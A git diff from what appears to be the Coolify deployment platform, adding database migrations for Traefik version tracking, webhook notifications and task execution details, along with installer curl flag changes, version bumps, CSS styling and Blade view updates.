000000000..067861e16 --- /dev/null +++ b/database/migrations/2025_11_09_000001_add_timeout_to_scheduled_tasks_table.php @@ -0,0 +1,28 @@ +integer('timeout')->default(300)->after('frequency'); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('scheduled_tasks', function (Blueprint $table) { + $table->dropColumn('timeout'); + }); + } +}; diff --git a/database/migrations/2025_11_09_000002_improve_scheduled_task_executions_tracking.php b/database/migrations/2025_11_09_000002_improve_scheduled_task_executions_tracking.php new file mode 100644 index 000000000..14fdd5998 --- /dev/null +++ b/database/migrations/2025_11_09_000002_improve_scheduled_task_executions_tracking.php @@ -0,0 +1,31 @@ +timestamp('started_at')->nullable()->after('scheduled_task_id'); + $table->integer('retry_count')->default(0)->after('status'); + $table->decimal('duration', 10, 2)->nullable()->after('retry_count')->comment('Duration in seconds'); + $table->text('error_details')->nullable()->after('message'); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('scheduled_task_executions', function (Blueprint $table) { + $table->dropColumn(['started_at', 'retry_count', 'duration', 'error_details']); + }); + } +}; diff --git a/database/migrations/2025_11_10_112500_add_restart_tracking_to_applications_table.php b/database/migrations/2025_11_10_112500_add_restart_tracking_to_applications_table.php new file mode 100644 index 000000000..329ac7af9 --- /dev/null +++ b/database/migrations/2025_11_10_112500_add_restart_tracking_to_applications_table.php @@ -0,0 +1,30 @@ +integer('restart_count')->default(0)->after('status'); + $table->timestamp('last_restart_at')->nullable()->after('restart_count'); + $table->string('last_restart_type', 10)->nullable()->after('last_restart_at'); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('applications', function (Blueprint $table) { + $table->dropColumn(['restart_count', 'last_restart_at', 'last_restart_type']); + }); + } +}; diff --git a/database/migrations/2025_11_12_130931_add_traefik_version_tracking_to_servers_table.php b/database/migrations/2025_11_12_130931_add_traefik_version_tracking_to_servers_table.php new file mode 100644 index 000000000..3bab33368 --- /dev/null +++ b/database/migrations/2025_11_12_130931_add_traefik_version_tracking_to_servers_table.php @@ -0,0 +1,28 @@ +string('detected_traefik_version')->nullable(); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('servers', function (Blueprint $table) { + $table->dropColumn('detected_traefik_version'); + }); + } +}; diff --git a/database/migrations/2025_11_12_131252_add_traefik_outdated_to_email_notification_settings.php b/database/migrations/2025_11_12_131252_add_traefik_outdated_to_email_notification_settings.php new file mode 100644 index 000000000..ac509dc71 --- /dev/null +++ b/database/migrations/2025_11_12_131252_add_traefik_outdated_to_email_notification_settings.php @@ -0,0 +1,28 @@ +boolean('traefik_outdated_email_notifications')->default(true); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('email_notification_settings', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_email_notifications'); + }); + } +}; diff --git a/database/migrations/2025_11_12_133400_add_traefik_outdated_thread_id_to_telegram_notification_settings.php b/database/migrations/2025_11_12_133400_add_traefik_outdated_thread_id_to_telegram_notification_settings.php new file mode 100644 index 000000000..b7d69e634 --- /dev/null +++ b/database/migrations/2025_11_12_133400_add_traefik_outdated_thread_id_to_telegram_notification_settings.php @@ -0,0 +1,28 @@ +text('telegram_notifications_traefik_outdated_thread_id')->nullable(); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('telegram_notification_settings', function (Blueprint $table) { + $table->dropColumn('telegram_notifications_traefik_outdated_thread_id'); + }); + } +}; diff --git a/database/migrations/2025_11_14_114632_add_traefik_outdated_info_to_servers_table.php b/database/migrations/2025_11_14_114632_add_traefik_outdated_info_to_servers_table.php new file mode 100644 index 000000000..99e10707d --- /dev/null +++ b/database/migrations/2025_11_14_114632_add_traefik_outdated_info_to_servers_table.php @@ -0,0 +1,28 @@ +json('traefik_outdated_info')->nullable(); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('servers', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_info'); + }); + } +}; diff --git a/database/migrations/2025_11_16_000001_create_webhook_notification_settings_table.php b/database/migrations/2025_11_16_000001_create_webhook_notification_settings_table.php new file mode 100644 index 000000000..9e9a6303f --- /dev/null +++ b/database/migrations/2025_11_16_000001_create_webhook_notification_settings_table.php @@ -0,0 +1,88 @@ +id(); + $table->foreignId('team_id')->constrained()->cascadeOnDelete(); + + $table->boolean('webhook_enabled')->default(false); + $table->text('webhook_url')->nullable(); + + $table->boolean('deployment_success_webhook_notifications')->default(false); + $table->boolean('deployment_failure_webhook_notifications')->default(true); + $table->boolean('status_change_webhook_notifications')->default(false); + $table->boolean('backup_success_webhook_notifications')->default(false); + $table->boolean('backup_failure_webhook_notifications')->default(true); + $table->boolean('scheduled_task_success_webhook_notifications')->default(false); + $table->boolean('scheduled_task_failure_webhook_notifications')->default(true); + $table->boolean('docker_cleanup_success_webhook_notifications')->default(false); + $table->boolean('docker_cleanup_failure_webhook_notifications')->default(true); + $table->boolean('server_disk_usage_webhook_notifications')->default(true); + $table->boolean('server_reachable_webhook_notifications')->default(false); + $table->boolean('server_unreachable_webhook_notifications')->default(true); + $table->boolean('server_patch_webhook_notifications')->default(false); + + $table->unique(['team_id']); + }); + } + + // Populate webhook notification settings for existing teams (only if they don't already have settings) + DB::table('teams')->chunkById(100, function ($teams) { + foreach ($teams as $team) { + try { + // Check if settings already exist for this team + $exists = DB::table('webhook_notification_settings') + ->where('team_id', $team->id) + ->exists(); + + if (! $exists) { + // Only insert if no settings exist - don't overwrite existing preferences + DB::table('webhook_notification_settings')->insert([ + 'team_id' => $team->id, + 'webhook_enabled' => false, + 'webhook_url' => null, + 'deployment_success_webhook_notifications' => false, + 'deployment_failure_webhook_notifications' => true, + 'status_change_webhook_notifications' => false, + 'backup_success_webhook_notifications' => false, + 'backup_failure_webhook_notifications' => true, + 'scheduled_task_success_webhook_notifications' => false, + 'scheduled_task_failure_webhook_notifications' => true, + 'docker_cleanup_success_webhook_notifications' => false, + 'docker_cleanup_failure_webhook_notifications' => true, + 'server_disk_usage_webhook_notifications' => true, + 'server_reachable_webhook_notifications' => false, + 'server_unreachable_webhook_notifications' => true, + 'server_patch_webhook_notifications' => false, + 'traefik_outdated_webhook_notifications' => true, + ]); + } + } catch (\Throwable $e) { + Log::error('Error creating webhook notification settings for team '.$team->id.': '.$e->getMessage()); + } + } + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::dropIfExists('webhook_notification_settings'); + } +}; diff --git a/database/migrations/2025_11_16_000002_create_cloud_init_scripts_table.php b/database/migrations/2025_11_16_000002_create_cloud_init_scripts_table.php new file mode 100644 index 000000000..11c5b99a3 --- /dev/null +++ b/database/migrations/2025_11_16_000002_create_cloud_init_scripts_table.php @@ -0,0 +1,33 @@ +id(); + $table->foreignId('team_id')->constrained()->cascadeOnDelete(); + $table->string('name'); + $table->text('script'); // Encrypted in the model + $table->timestamps(); + }); + } + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::dropIfExists('cloud_init_scripts'); + } +}; diff --git a/database/migrations/2025_11_17_092707_add_traefik_outdated_to_notification_settings.php b/database/migrations/2025_11_17_092707_add_traefik_outdated_to_notification_settings.php new file mode 100644 index 000000000..b5cad28b0 --- /dev/null +++ b/database/migrations/2025_11_17_092707_add_traefik_outdated_to_notification_settings.php @@ -0,0 +1,60 @@ +boolean('traefik_outdated_discord_notifications')->default(true); + }); + + Schema::table('slack_notification_settings', function (Blueprint $table) { + $table->boolean('traefik_outdated_slack_notifications')->default(true); + }); + + Schema::table('webhook_notification_settings', function (Blueprint $table) { + $table->boolean('traefik_outdated_webhook_notifications')->default(true); + }); + + Schema::table('telegram_notification_settings', function (Blueprint $table) { + $table->boolean('traefik_outdated_telegram_notifications')->default(true); + }); + + Schema::table('pushover_notification_settings', function (Blueprint $table) { + $table->boolean('traefik_outdated_pushover_notifications')->default(true); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('discord_notification_settings', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_discord_notifications'); + }); + + Schema::table('slack_notification_settings', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_slack_notifications'); + }); + + Schema::table('webhook_notification_settings', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_webhook_notifications'); + }); + + Schema::table('telegram_notification_settings', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_telegram_notifications'); + }); + + Schema::table('pushover_notification_settings', function (Blueprint $table) { + $table->dropColumn('traefik_outdated_pushover_notifications'); + }); + } +}; diff --git a/database/migrations/2025_11_18_083747_cleanup_dockerfile_data_for_non_dockerfile_buildpacks.php b/database/migrations/2025_11_18_083747_cleanup_dockerfile_data_for_non_dockerfile_buildpacks.php new file mode 100644 index 000000000..959662cd5 --- /dev/null +++ b/database/migrations/2025_11_18_083747_cleanup_dockerfile_data_for_non_dockerfile_buildpacks.php @@ -0,0 +1,31 @@ +where('build_pack', '!=', 'dockerfile') + ->update([ + 'dockerfile' => null, + 'dockerfile_location' => null, + 'dockerfile_target_build' => null, + 'custom_healthcheck_found' => false, + ]); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + // No rollback needed - we're cleaning up corrupt data + } +}; diff --git a/database/migrations/2025_11_26_124200_add_build_cache_settings_to_application_settings.php b/database/migrations/2025_11_26_124200_add_build_cache_settings_to_application_settings.php new file mode 100644 index 000000000..5f41816f6 --- /dev/null +++ b/database/migrations/2025_11_26_124200_add_build_cache_settings_to_application_settings.php @@ -0,0 +1,30 @@ +boolean('inject_build_args_to_dockerfile')->default(true)->after('use_build_secrets'); + $table->boolean('include_source_commit_in_build')->default(false)->after('inject_build_args_to_dockerfile'); + }); + } + + /** + * Reverse the migrations. + */ + public function down(): void + { + Schema::table('application_settings', function (Blueprint $table) { + $table->dropColumn('inject_build_args_to_dockerfile'); + $table->dropColumn('include_source_commit_in_build'); + }); + } +}; diff --git a/database/seeders/ProductionSeeder.php b/database/seeders/ProductionSeeder.php index adada458e..511af1a9f 100644 --- a/database/seeders/ProductionSeeder.php +++ b/database/seeders/ProductionSeeder.php @@ -113,6 +113,8 @@ public function run(): void $server_details['proxy'] = ServerMetadata::from([ 'type' => ProxyTypes::TRAEFIK->value, 'status' => ProxyStatus::EXITED->value, + 'last_saved_settings' => null, + 'last_applied_settings' => null, ]); $server = Server::create($server_details); $server->settings->is_reachable = true; @@ -177,6 +179,8 @@ public function run(): void $server_details['proxy'] = ServerMetadata::from([ 'type' => ProxyTypes::TRAEFIK->value, 'status' => ProxyStatus::EXITED->value, + 'last_saved_settings' => null, + 'last_applied_settings' => null, ]); $server = Server::create($server_details); $server->settings->is_reachable = true; diff --git a/database/seeders/S3StorageSeeder.php b/database/seeders/S3StorageSeeder.php index de7cef6dc..9fa531447 100644 --- a/database/seeders/S3StorageSeeder.php +++ b/database/seeders/S3StorageSeeder.php @@ -20,6 +20,7 @@ public function run(): void 'bucket' => 'local', 'endpoint' => 'http://coolify-minio:9000', 'team_id' => 0, + 'is_usable' => true, ]); } } diff --git a/docker-compose.dev.yml b/docker-compose.dev.yml index d76c91aa2..4f41f1c63 100644 --- a/docker-compose.dev.yml +++ b/docker-compose.dev.yml @@ -118,6 +118,26 @@ services: - dev_minio_data:/data networks: - coolify + minio-init: + image: minio/mc:latest + pull_policy: always + container_name: coolify-minio-init + restart: no + depends_on: + - minio + entrypoint: > + /bin/sh -c " + echo 'Waiting for MinIO to be ready...'; + until mc alias set local http://coolify-minio:9000 minioadmin minioadmin 2>/dev/null; do + echo 'MinIO not ready yet, waiting...'; + sleep 2; + done; + echo 'MinIO is ready, creating bucket if needed...'; + mc mb local/local --ignore-existing; + echo 'MinIO initialization complete - bucket local is ready'; + " + networks: + - coolify volumes: dev_backups_data: diff --git a/docker/development/etc/nginx/site-opts.d/http.conf b/docker/development/etc/nginx/site-opts.d/http.conf index a5bbd78a3..d7855ae80 100644 --- a/docker/development/etc/nginx/site-opts.d/http.conf +++ b/docker/development/etc/nginx/site-opts.d/http.conf @@ -13,6 +13,9 @@ charset utf-8; # Set max upload to 2048M client_max_body_size 2048M; +# Set client body buffer to handle Sentinel payloads in memory +client_body_buffer_size 256k; + # Healthchecks: Set /healthcheck to be the healthcheck URL location /healthcheck { access_log off; diff --git a/docker/production/etc/nginx/site-opts.d/http.conf b/docker/production/etc/nginx/site-opts.d/http.conf index a5bbd78a3..d7855ae80 100644 --- a/docker/production/etc/nginx/site-opts.d/http.conf +++ b/docker/production/etc/nginx/site-opts.d/http.conf @@ -13,6 +13,9 @@ charset utf-8; # Set max upload to 2048M client_max_body_size 2048M; +# Set client body buffer to handle Sentinel payloads in memory +client_body_buffer_size 256k; + # Healthchecks: Set /healthcheck to be the healthcheck URL location /healthcheck { access_log off; diff --git a/jean.json b/jean.json index c625e08c0..4e5c788ed 100644 --- a/jean.json +++ b/jean.json @@ -1,6 +1,5 @@ { "scripts": { - "onWorktreeCreate": "cp $JEAN_ROOT_PATH/.env . && mkdir -p .claude && cp $JEAN_ROOT_PATH/.claude/settings.local.json .claude/settings.local.json", - "run": "docker rm -f coolify coolify-realtime coolify-minio coolify-testing-host coolify-redis coolify-db coolify-mail coolify-vite && spin up" + "setup": "cp $JEAN_ROOT_PATH/.env . && mkdir -p .claude && cp $JEAN_ROOT_PATH/.claude/settings.local.json .claude/settings.local.json" } } diff --git a/other/nightly/install.sh b/other/nightly/install.sh index bcd37e71f..ac4e3caff 100755 --- a/other/nightly/install.sh +++ b/other/nightly/install.sh @@ -288,9 +288,9 @@ if [ "$OS_TYPE" = 'amzn' ]; then dnf install -y findutils >/dev/null fi -LATEST_VERSION=$(curl --silent $CDN/versions.json | grep -i version | xargs | awk '{print $2}' | tr -d ',') -LATEST_HELPER_VERSION=$(curl --silent $CDN/versions.json | grep -i version | xargs | awk '{print $6}' | tr -d ',') -LATEST_REALTIME_VERSION=$(curl --silent $CDN/versions.json | grep -i version | xargs | awk '{print $8}' | tr -d ',') +LATEST_VERSION=$(curl -L --silent $CDN/versions.json | grep -i version | xargs | awk '{print $2}' | tr -d ',') +LATEST_HELPER_VERSION=$(curl -L --silent $CDN/versions.json | grep -i version | xargs | awk '{print $6}' | tr -d ',') +LATEST_REALTIME_VERSION=$(curl -L --silent $CDN/versions.json | grep -i version | xargs | awk '{print $8}' | tr -d ',') if [ -z "$LATEST_HELPER_VERSION" ]; then LATEST_HELPER_VERSION=latest @@ -705,10 +705,10 @@ else fi echo -e "5. Download required files from CDN. " -curl -fsSL $CDN/docker-compose.yml -o /data/coolify/source/docker-compose.yml -curl -fsSL $CDN/docker-compose.prod.yml -o /data/coolify/source/docker-compose.prod.yml -curl -fsSL $CDN/.env.production -o /data/coolify/source/.env.production -curl -fsSL $CDN/upgrade.sh -o /data/coolify/source/upgrade.sh +curl -fsSL -L $CDN/docker-compose.yml -o /data/coolify/source/docker-compose.yml +curl -fsSL -L $CDN/docker-compose.prod.yml -o /data/coolify/source/docker-compose.prod.yml +curl -fsSL -L $CDN/.env.production -o /data/coolify/source/.env.production +curl -fsSL -L $CDN/upgrade.sh -o /data/coolify/source/upgrade.sh echo -e "6. Setting up environment variable file" diff --git a/other/nightly/versions.json b/other/nightly/versions.json index a83b4c8ce..577fdfe18 100644 --- a/other/nightly/versions.json +++ b/other/nightly/versions.json @@ -1,19 +1,29 @@ { "coolify": { "v4": { - "version": "4.0.0-beta.442" + "version": "4.0.0-beta.452" }, "nightly": { - "version": "4.0.0-beta.443" + "version": "4.0.0-beta.453" }, "helper": { - "version": "1.0.11" + "version": "1.0.12" }, "realtime": { "version": "1.0.10" }, "sentinel": { - "version": "0.0.16" + "version": "0.0.18" } + }, + "traefik": { + "v3.6": "3.6.1", + "v3.5": "3.5.6", + "v3.4": "3.4.5", + "v3.3": "3.3.7", + "v3.2": "3.2.5", + "v3.1": "3.1.7", + "v3.0": "3.0.4", + "v2.11": "2.11.31" } } \ No newline at end of file diff --git a/package-lock.json b/package-lock.json index 9e8fe7328..b076800e6 100644 --- a/package-lock.json +++ b/package-lock.json @@ -2664,11 +2664,11 @@ } }, "node_modules/tar": { - "version": "7.5.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.5.1.tgz", - "integrity": "sha512-nlGpxf+hv0v7GkWBK2V9spgactGOp0qvfWRxUMjqHyzrt3SgwE48DIv/FhqPHJYLHpgW1opq3nERbz5Anq7n1g==", + "version": "7.5.2", + "resolved": "https://registry.npmjs.org/tar/-/tar-7.5.2.tgz", + "integrity": "sha512-7NyxrTE4Anh8km8iEy7o0QYPs+0JKBTj5ZaqHg6B39erLg0qYXN3BijtShwbsNSvQ+LN75+KV+C4QR/f6Gwnpg==", "dev": true, - "license": "ISC", + "license": "BlueOak-1.0.0", "dependencies": { "@isaacs/fs-minipass": "^4.0.0", "chownr": "^3.0.0", diff --git a/public/svgs/opnform.svg b/public/svgs/opnform.svg new file mode 100644 index 000000000..70562a4bf --- /dev/null +++ b/public/svgs/opnform.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/public/svgs/palworld.svg b/public/svgs/palworld.svg new file mode 100644 index 000000000..f5fff5bc8 --- /dev/null +++ b/public/svgs/palworld.svg @@ -0,0 +1,18 @@ + + + + + + + + + + + + + + + + + + diff --git a/public/svgs/pangolin-logo.png b/public/svgs/pangolin-logo.png new file mode 100644 index 000000000..fb7a252d9 Binary files /dev/null and b/public/svgs/pangolin-logo.png differ diff --git a/public/svgs/postgresus.svg b/public/svgs/postgresus.svg new file mode 100644 index 000000000..a45e81167 --- /dev/null +++ b/public/svgs/postgresus.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/public/svgs/tailscale.svg b/public/svgs/tailscale.svg new file mode 100644 index 000000000..cde7dbd50 --- /dev/null +++ b/public/svgs/tailscale.svg @@ -0,0 +1,7 @@ + + + Tailscale Streamline Icon: https://streamlinehq.com + + Tailscale + + \ No newline at end of file diff --git a/resources/css/utilities.css b/resources/css/utilities.css index 5d8a6bfa1..2899ea1e5 100644 --- a/resources/css/utilities.css +++ b/resources/css/utilities.css @@ -32,7 +32,20 @@ @utility apexcharts-tooltip-custom-title { } @utility input-sticky { - @apply block py-1.5 w-full text-sm text-black rounded-sm border-0 ring-1 ring-inset dark:bg-coolgray-100 dark:text-white ring-neutral-200 dark:ring-coolgray-300 focus-visible:outline-none focus-visible:border-l-4 focus-visible:border-l-coollabs dark:focus-visible:border-l-warning; + @apply block py-1.5 w-full text-sm text-black rounded-sm border-0 dark:bg-coolgray-100 dark:text-white disabled:bg-neutral-200 disabled:text-neutral-500 dark:disabled:bg-coolgray-100/40 focus-visible:outline-none; + box-shadow: inset 4px 0 0 transparent, inset 0 0 0 1px #e5e5e5; + + &:where(.dark, .dark *) { + box-shadow: inset 4px 0 0 transparent, inset 0 0 0 1px #242424; + } + + &:focus-visible { + box-shadow: inset 4px 0 0 #6b16ed, inset 0 0 0 1px #e5e5e5; + } + + &:where(.dark, .dark *):focus-visible { + box-shadow: inset 4px 0 0 #fcd452, inset 0 0 0 1px #242424; + } } @utility input-sticky-active { @@ -46,20 +59,49 @@ @utility input-focus { /* input, select before */ @utility input-select { - @apply block py-1.5 w-full text-sm text-black rounded-sm border-0 ring-2 ring-inset dark:bg-coolgray-100 dark:text-white ring-neutral-200 dark:ring-coolgray-300 disabled:bg-neutral-200 disabled:text-neutral-500 dark:disabled:bg-coolgray-100/40 dark:disabled:ring-transparent; + @apply block py-1.5 w-full text-sm text-black rounded-sm border-0 dark:bg-coolgray-100 dark:text-white disabled:bg-neutral-200 disabled:text-neutral-500 dark:disabled:bg-coolgray-100/40; + box-shadow: inset 4px 0 0 transparent, inset 0 0 0 2px #e5e5e5; + + &:where(.dark, .dark *) { + box-shadow: inset 4px 0 0 transparent, inset 0 0 0 2px #242424; + } + + &:disabled { + box-shadow: none; + } + + &:where(.dark, .dark *):disabled { + box-shadow: none; + } } /* Readonly */ @utility input { - @apply dark:read-only:text-neutral-500 dark:read-only:ring-0 dark:read-only:bg-coolgray-100/40 placeholder:text-neutral-300 dark:placeholder:text-neutral-700 read-only:text-neutral-500 read-only:bg-neutral-200; + @apply dark:read-only:text-neutral-500 dark:read-only:bg-coolgray-100/40 placeholder:text-neutral-300 dark:placeholder:text-neutral-700 read-only:text-neutral-500 read-only:bg-neutral-200; @apply input-select; - @apply focus-visible:outline-none focus-visible:border-l-4 focus-visible:border-l-coollabs dark:focus-visible:border-l-warning; + @apply focus-visible:outline-none; + + &:focus-visible { + box-shadow: inset 4px 0 0 #6b16ed, inset 0 0 0 2px #e5e5e5; + } + + &:where(.dark, .dark *):focus-visible { + box-shadow: inset 4px 0 0 #fcd452, inset 0 0 0 2px #242424; + } + + &:read-only { + box-shadow: none; + } + + &:where(.dark, .dark *):read-only { + box-shadow: none; + } } @utility select { @apply w-full; @apply input-select; - @apply focus-visible:outline-none focus-visible:border-l-4 focus-visible:border-l-coollabs dark:focus-visible:border-l-warning; + @apply focus-visible:outline-none; background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='none' viewBox='0 0 24 24' stroke-width='1.5' stroke='%23000000'%3e%3cpath stroke-linecap='round' stroke-linejoin='round' d='M8.25 15L12 18.75 15.75 15m-7.5-6L12 5.25 15.75 9'/%3e%3c/svg%3e"); background-position: right 0.5rem center; background-repeat: no-repeat; @@ -69,6 +111,14 @@ @utility select { &:where(.dark, .dark *) { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='none' viewBox='0 0 24 24' stroke-width='1.5' stroke='%23ffffff'%3e%3cpath stroke-linecap='round' stroke-linejoin='round' d='M8.25 15L12 18.75 15.75 15m-7.5-6L12 5.25 15.75 9'/%3e%3c/svg%3e"); } + + &:focus-visible { + box-shadow: inset 4px 0 0 #6b16ed, inset 0 0 0 2px #e5e5e5; + } + + &:where(.dark, .dark *):focus-visible { + box-shadow: inset 4px 0 0 #fcd452, inset 0 0 0 2px #242424; + } } @utility button { diff --git a/resources/views/components/callout.blade.php b/resources/views/components/callout.blade.php index e65dad63b..67da3ba7f 100644 --- a/resources/views/components/callout.blade.php +++ b/resources/views/components/callout.blade.php @@ -1,13 +1,13 @@ -@props(['type' => 'warning', 'title' => 'Warning', 'class' => '']) +@props(['type' => 'warning', 'title' => 'Warning', 'class' => '', 'dismissible' => false, 'onDismiss' => null]) @php $icons = [ 'warning' => '', - + 'danger' => '', - + 'info' => '', - + 'success' => '' ]; @@ -42,12 +42,12 @@ $icon = $icons[$type] ?? $icons['warning']; @endphp -

merge(['class' => 'p-4 border rounded-lg ' . $colorScheme['bg'] . ' ' . $colorScheme['border'] . ' ' . $class]) }}> +
merge(['class' => 'relative p-4 border rounded-lg ' . $colorScheme['bg'] . ' ' . $colorScheme['border'] . ' ' . $class]) }}>
{!! $icon !!}
-
+
{{ $title }}
@@ -55,5 +55,15 @@ {{ $slot }}
+ @if($dismissible && $onDismiss) + + @endif
\ No newline at end of file diff --git a/resources/views/components/forms/datalist.blade.php b/resources/views/components/forms/datalist.blade.php index 79a14d16f..1d9a3b263 100644 --- a/resources/views/components/forms/datalist.blade.php +++ b/resources/views/components/forms/datalist.blade.php @@ -97,12 +97,14 @@ }" @click.outside="open = false" class="relative"> {{-- Unified Input Container with Tags Inside --}} -
+ wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]"> {{-- Selected Tags Inside Input --}}
-
+ \ No newline at end of file diff --git a/resources/views/livewire/notifications/discord.blade.php b/resources/views/livewire/notifications/discord.blade.php index dbf56b027..0e5406c78 100644 --- a/resources/views/livewire/notifications/discord.blade.php +++ b/resources/views/livewire/notifications/discord.blade.php @@ -80,6 +80,8 @@ label="Server Unreachable" /> + diff --git a/resources/views/livewire/notifications/email.blade.php b/resources/views/livewire/notifications/email.blade.php index 345d6bc58..538851137 100644 --- a/resources/views/livewire/notifications/email.blade.php +++ b/resources/views/livewire/notifications/email.blade.php @@ -161,6 +161,8 @@ class="p-4 border dark:border-coolgray-300 border-neutral-200 rounded-lg flex fl label="Server Unreachable" /> + diff --git a/resources/views/livewire/notifications/pushover.blade.php b/resources/views/livewire/notifications/pushover.blade.php index 8c967030f..74cd9e8d2 100644 --- a/resources/views/livewire/notifications/pushover.blade.php +++ b/resources/views/livewire/notifications/pushover.blade.php @@ -82,6 +82,8 @@ label="Server Unreachable" /> + diff --git a/resources/views/livewire/notifications/slack.blade.php b/resources/views/livewire/notifications/slack.blade.php index ce4dd5d2d..14c7b3508 100644 --- a/resources/views/livewire/notifications/slack.blade.php +++ b/resources/views/livewire/notifications/slack.blade.php @@ -74,6 +74,7 @@ + diff --git a/resources/views/livewire/notifications/telegram.blade.php b/resources/views/livewire/notifications/telegram.blade.php index 7b07b4e22..1c83caf70 100644 --- a/resources/views/livewire/notifications/telegram.blade.php +++ b/resources/views/livewire/notifications/telegram.blade.php @@ -169,6 +169,15 @@ + +
+
+ +
+ +
diff --git a/resources/views/livewire/notifications/webhook.blade.php b/resources/views/livewire/notifications/webhook.blade.php index 4646aaccd..7c32311bf 100644 --- a/resources/views/livewire/notifications/webhook.blade.php +++ b/resources/views/livewire/notifications/webhook.blade.php @@ -83,6 +83,8 @@ class="normal-case dark:text-white btn btn-xs no-animation btn-primary"> id="serverUnreachableWebhookNotifications" label="Server Unreachable" /> + diff --git a/resources/views/livewire/project/application/advanced.blade.php b/resources/views/livewire/project/application/advanced.blade.php index 62d4380e9..bd5f5b1e8 100644 --- a/resources/views/livewire/project/application/advanced.blade.php +++ b/resources/views/livewire/project/application/advanced.blade.php @@ -22,6 +22,14 @@ @endif + + @if ($application->settings->is_container_label_readonly_enabled) Servers - @if (str($application->status)->contains('degraded')) - + @if ($application->server_status == false) + - @elseif ($application->server_status == false) - + @elseif ($application->additional_servers()->exists() && str($application->status)->contains('degraded')) + diff --git a/resources/views/livewire/project/application/general.blade.php b/resources/views/livewire/project/application/general.blade.php index 8e614a4e9..65e94dd23 100644 --- a/resources/views/livewire/project/application/general.blade.php +++ b/resources/views/livewire/project/application/general.blade.php @@ -12,6 +12,12 @@
{{ $application->compose_parsing_version }}
@endif Save + @if ($application->build_pack === 'dockercompose') + + {{ $application->docker_compose_raw ? 'Reload Compose File' : 'Load Compose File' }} + + @endif
General configuration for your application.
@@ -40,9 +46,10 @@ @if ($application->build_pack === 'dockercompose') @if ( - !is_null($parsedServices) && + !is_null($parsedServices) && count($parsedServices) > 0 && - !$application->settings->is_raw_compose_deployment_enabled) + !$application->settings->is_raw_compose_deployment_enabled + )

Domains

@foreach (data_get($parsedServices, 'services') as $serviceName => $service) @if (!isDatabaseImage(data_get($service, 'image'))) @@ -73,11 +80,11 @@ buttonTitle="Generate Default Nginx Configuration" buttonFullWidth submitAction="generateNginxConfiguration('{{ $application->settings->is_spa ? 'spa' : 'static' }}')" :actions="[ - 'This will overwrite your current custom Nginx configuration.', - 'The default configuration will be generated based on your application type (' . - ($application->settings->is_spa ? 'SPA' : 'static') . - ').', - ]" /> + 'This will overwrite your current custom Nginx configuration.', + 'The default configuration will be generated based on your application type (' . + ($application->settings->is_spa ? 'SPA' : 'static') . + ').', + ]" /> @endcan @endif
@@ -159,9 +166,8 @@
@if ($application->destination->server->isSwarm()) @if ($application->build_pack !== 'dockerimage') -
Docker Swarm requires the image to be available in a registry. More info here.
+
Docker Swarm requires the image to be available in a registry. More info here.
@endif @endif
@@ -173,19 +179,19 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry" helper="Enter a tag (e.g., 'latest', 'v1.2.3') or SHA256 hash (e.g., 'sha256-59e02939b1bf39f16c93138a28727aec520bb916da021180ae502c61626b3cf0')" x-bind:disabled="!canUpdate" /> @else - + @endif @else @if ( - $application->destination->server->isSwarm() || + $application->destination->server->isSwarm() || $application->additional_servers->count() > 0 || - $application->settings->is_build_server_enabled) - + $application->settings->is_build_server_enabled + ) + - + @endif @@ -233,16 +238,14 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry" @if ($application->build_pack === 'dockercompose') @can('update', $application)
- @else + @else
- @endcan + @endcan
- - +
@@ -257,15 +260,29 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry" know what are you doing.
- -
+ @if ($this->dockerComposeCustomBuildCommand) +
+ +
+ @endif + @if ($this->dockerComposeCustomStartCommand) +
+ +
+ @endif @if ($this->application->is_github_based() && !$this->application->is_public_repository())
@endif
- @else + @else
+ helper="Directory to use as root. Useful for monorepos." x-bind:disabled="!canUpdate" /> @if ($application->build_pack === 'dockerfile' && !$application->dockerfile) - @endif @if ($application->build_pack === 'dockerfile') + helper="Useful if you have multi-staged dockerfile." x-bind:disabled="!canUpdate" /> @endif @if ($application->could_set_build_commands()) @if ($application->settings->is_static) - + @else - + @endif @endif @@ -314,8 +328,7 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry" + id="customDockerRunOptions" label="Custom Docker Options" x-bind:disabled="!canUpdate" /> @if ($application->build_pack !== 'dockercompose')
@@ -325,156 +338,204 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry" x-bind:disabled="!canUpdate" />
@endif - @endif -
+ @endif +
@endif -
- @if ($application->build_pack === 'dockercompose') -
-

Docker Compose

- @can('update', $application) - Reload Compose File - @endcan
- @if ($application->settings->is_raw_compose_deployment_enabled) - - @else - @if ((int) $application->compose_parsing_version >= 3) + @if ($application->build_pack === 'dockercompose') +
+
+

Docker Compose

+ +
+ @if ($application->settings->is_raw_compose_deployment_enabled) - @endif - - @endif -
- - {{-- --}} -
- @endif - @if ($application->dockerfile) - - @endif - @if ($application->build_pack !== 'dockercompose') -

Network

-
